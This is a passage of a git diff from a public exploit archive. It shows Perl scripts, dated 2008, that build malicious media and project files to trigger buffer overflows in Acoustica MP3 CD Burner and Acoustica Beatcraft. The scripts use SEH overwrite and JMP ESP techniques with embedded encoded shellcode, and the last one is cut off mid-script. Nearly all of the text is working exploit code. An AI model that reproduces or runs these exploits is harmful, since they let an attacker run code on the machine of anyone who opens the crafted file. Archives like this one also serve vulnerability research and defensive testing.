"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00". + "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40". + "\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00". + "\x00\x00\xF0\x3F\x54\x72\x6B\x41\x98\x03\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". + "\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "$buff". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x01\x00\x00\x46\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00". + "\x45\x66\x78\x4C"; + +open (MYFILE, '>>Exploit.mx4'); +binmode(MYFILE); +print MYFILE "$tuff"; +close (MYFILE); +print "Exploit file has been created. ( Exploit.mx4 )\n"; + +# milw0rm.com [2008-08-28] diff --git a/platforms/windows/local/6329.pl b/platforms/windows/local/6329.pl index 2d1cd521f..f2f9484a3 100755 --- a/platforms/windows/local/6329.pl +++ b/platforms/windows/local/6329.pl 
@@ -1,65 +1,65 @@ -#!/usr/bin/perl -# -# Acoustica MP3 CD Burner (asx file) Local BOF Exploit -# Author: Koshi -# -# Date: 08-29-08 ( 0day ) -# Application: Acoustica MP3 CD Burner -# Version: 4.51 Build 147 ( possibly older ) -# Site: http://acoustica.com/download.htm -# Tested On: Windows XP SP3 Fully Patched -# -# Based off of n00b's findings http://www.milw0rm.com/exploits/4017 -# gr33tz: Rima my baby, str0ke, n00b ( nice find ) - - -# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32". -"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d". -"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c". -"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67". -"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74". -"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b". -"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b". -"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d". -"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56". -"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55". -"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59". -"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b". -"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47". -"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b". -"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51". -"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f". -"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55". -"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71". -"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75". 
-"\x50\x66"; - -my $bof = "A"x480; -my $led = "\x90"x35; -my $fill = "\x90"x150; -my $buff = "". - "$bof". - "\xeb\x06\x90\x90". ### Pointer to next SEH record ### - "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ### - "$led". - "$shellcode". - "$fill"; - -my $tuff = "". - "\n". - "Acoustica MP3 CD Burner Local BOF Exploit\n". - "\n\n"; - -open (MYFILE, '>>Exploit.asx'); -binmode(MYFILE); -print MYFILE "$tuff"; -close (MYFILE); -print "Exploit file has been created. ( Exploit.asx )\n"; - -# milw0rm.com [2008-08-29] +#!/usr/bin/perl +# +# Acoustica MP3 CD Burner (asx file) Local BOF Exploit +# Author: Koshi +# +# Date: 08-29-08 ( 0day ) +# Application: Acoustica MP3 CD Burner +# Version: 4.51 Build 147 ( possibly older ) +# Site: http://acoustica.com/download.htm +# Tested On: Windows XP SP3 Fully Patched +# +# Based off of n00b's findings http://www.milw0rm.com/exploits/4017 +# gr33tz: Rima my baby, str0ke, n00b ( nice find ) + + +# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32". +"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d". +"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c". +"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67". +"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74". +"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b". +"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b". +"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d". +"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56". +"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55". +"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59". 
+"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b". +"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47". +"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b". +"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51". +"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f". +"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55". +"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71". +"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75". +"\x50\x66"; + +my $bof = "A"x480; +my $led = "\x90"x35; +my $fill = "\x90"x150; +my $buff = "". + "$bof". + "\xeb\x06\x90\x90". ### Pointer to next SEH record ### + "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ### + "$led". + "$shellcode". + "$fill"; + +my $tuff = "". + "\n". + "Acoustica MP3 CD Burner Local BOF Exploit\n". + "\n\n"; + +open (MYFILE, '>>Exploit.asx'); +binmode(MYFILE); +print MYFILE "$tuff"; +close (MYFILE); +print "Exploit file has been created. ( Exploit.asx )\n"; + +# milw0rm.com [2008-08-29] diff --git a/platforms/windows/local/6333.pl b/platforms/windows/local/6333.pl index 35d034a6b..e0e032619 100755 --- a/platforms/windows/local/6333.pl +++ b/platforms/windows/local/6333.pl 
@@ -1,263 +1,263 @@ -#!/usr/bin/perl -# -# Acoustica Beatcraft (bcproj file) Local BOF Exploit -# Author: Koshi -# -# Date: 08-30-08 ( 0day ) -# Application: Acoustica Beatcraft -# Version(s): v1.02 Build 19 -# Site: http://acoustica.com/beatcraft/index.htm -# Tested On: Windows XP SP3 Fully Patched -# -# Acoustica Beatcraft contains a buffer prone to exploitation via an -# overly long string. The buffer contains the "title" of the "instruments" -# one can insert into a Beatcraft project. This exploit is a bit -# unstable in the fact that, to properly exploit it, one must open -# Beatcraft firstly, then proceed to open the exploit file from -# within Beatcraft. Simply double clicking the file will result -# in a simple DoS scenario. ( Hopefully I'll fix this soon ) -# My guess as of now is we're not going to have it both ways. -# -# gr33tz: Rima my baby, str0ke, breaker_unit, mess' -# - - -# win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com -my $shellcode = -"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24". -"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e". -"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41". -"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1". -"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a". -"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c". -"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44". -"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd". -"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4". -"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b". -"\xbd\x53\x64\xee\xc1"; - -my $led1 = "A"x110; # Sled ( \x41 INC ECX ) -my $led2 = "A"x34; # Sled ( \x41 INC ECX ) -my $buf1 = "A"x179; # Overflow - -my $buff = "". - "$buf1". # Overflowage... - "$led1". # Slide on down to the jump - "\xeb\x07". # Jump NTDLL address - "\xed\x1e\x94\x7c". 
# NTDLL.DLL JMP ESP ( This may need to be changed to a different JMP ESP ) - "\xeb\x31". # Line it up right and land into the sled - "$led2". # Slip on down to the shellcode - "$shellcode"; # ..to the beat of a different drum. - -my $tuff = "". - "\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00". - "\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64". - "\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B". - "\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00". - "\x62\x6B\x69\x74\x98\x01\x00\x00\x00\x00\x80\x3F\xE8\x2B\x56\x13\x9F\x06\xB1\x4F". - "\xB8\x24\x65\xE5\x00\xAB\xB8\xA7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x62\x74\x72\x61". - "\x28\x00\x00\x00\xCD\xCC\x8C\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x62\x73\x61\x6D\x9C\x02\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "$buff". - "\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x70\x61\x74\xA8\x01\x00\x00\x00\x00\x80\x3F". - "\x3C\xF3\x4B\x37\x40\x30\xEC\x4E\xA3\xD7\xB3\x2C\x48\x84\xE5\xAC\x01\x00\x00\x00". - "\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - 